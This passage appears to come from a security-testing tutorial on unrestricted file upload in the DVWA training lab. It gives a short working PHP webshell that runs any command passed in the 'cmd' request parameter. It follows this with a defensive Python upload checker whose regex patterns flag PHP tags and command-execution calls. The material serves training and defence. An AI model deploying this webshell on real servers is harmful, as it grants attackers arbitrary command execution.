Getting ready

In this recipe, we will upload a file to the server. We need to know where it is going to be stored so that we can access it programmatically. To get the upload location, go to Upload in DVWA and upload any JPG image. If the upload is successful, the application displays the path to which the file was uploaded (../../hackable/uploads/). Now we know the relative path where the application saves uploaded files; that's enough for this recipe.

Now create a file called webshell.php with the following content:

<?
system($_GET['cmd']);
echo PHP_EOL . 'Type a command: <form method="GET" action="../../hackable/uploads/webshell.php"><input type="text" name="cmd"/></form>' . PHP_EOL;
?>

Notice how the action parameter includes the upload path we got from uploading the JPG file.
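
The defensive counterpart to the file above, added here as an example (not code from the book or from DVWA): a Python check that an upload handler, or a periodic sweep of the uploads directory, could run to reject files such as webshell.php. The function name, finding labels and sample bytes are assumptions made for illustration, as is the premise that the feature should accept JPEG images only.

```python
import re

# Assumption: the upload feature is meant to accept JPEG images only.
ALLOWED_EXT = {"jpg", "jpeg"}
JPEG_MAGIC = b"\xff\xd8\xff"
# Extensions a PHP-enabled web server may hand to the interpreter.
SCRIPT_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
# "<?php", "<?=" or a short open tag; "<?xpacket" in image metadata is not matched.
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.I)
# Command-execution call fed directly from request input.
CMD_SINK = re.compile(
    rb"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*"
    rb"\$_(GET|POST|REQUEST|COOKIE)\b", re.I)


def inspect_upload(filename, data):
    """Return the reasons an uploaded file should be rejected (empty = accept)."""
    findings = []
    exts = filename.lower().split(".")[1:]
    if not exts or exts[-1] not in ALLOWED_EXT:
        findings.append("extension-not-allowed")
    # Catch names such as image.php.jpg, which some server configs still execute.
    if any(e in SCRIPT_EXT for e in exts):
        findings.append("script-extension")
    if not data.startswith(JPEG_MAGIC):
        findings.append("not-jpeg-content")
    # A valid JPEG header does not rule out embedded PHP, so scan the body too.
    if PHP_TAG.search(data):
        findings.append("php-open-tag")
    if CMD_SINK.search(data):
        findings.append("request-to-command-sink")
    return findings


# Constructed samples: the recipe's webshell body and a minimal JPEG-like header.
WEBSHELL = b"<?\nsystem($_GET['cmd']);\n?>"
JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 32

if __name__ == "__main__":
    for name, body in [("webshell.php", WEBSHELL), ("photo.jpg", JPEG),
                       ("photo.php.jpg", JPEG + WEBSHELL)]:
        print(name, inspect_upload(name, body) or "accept")
```

Content checks like these complement, and do not replace, storing uploads outside the web root or disabling script execution in the uploads directory.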
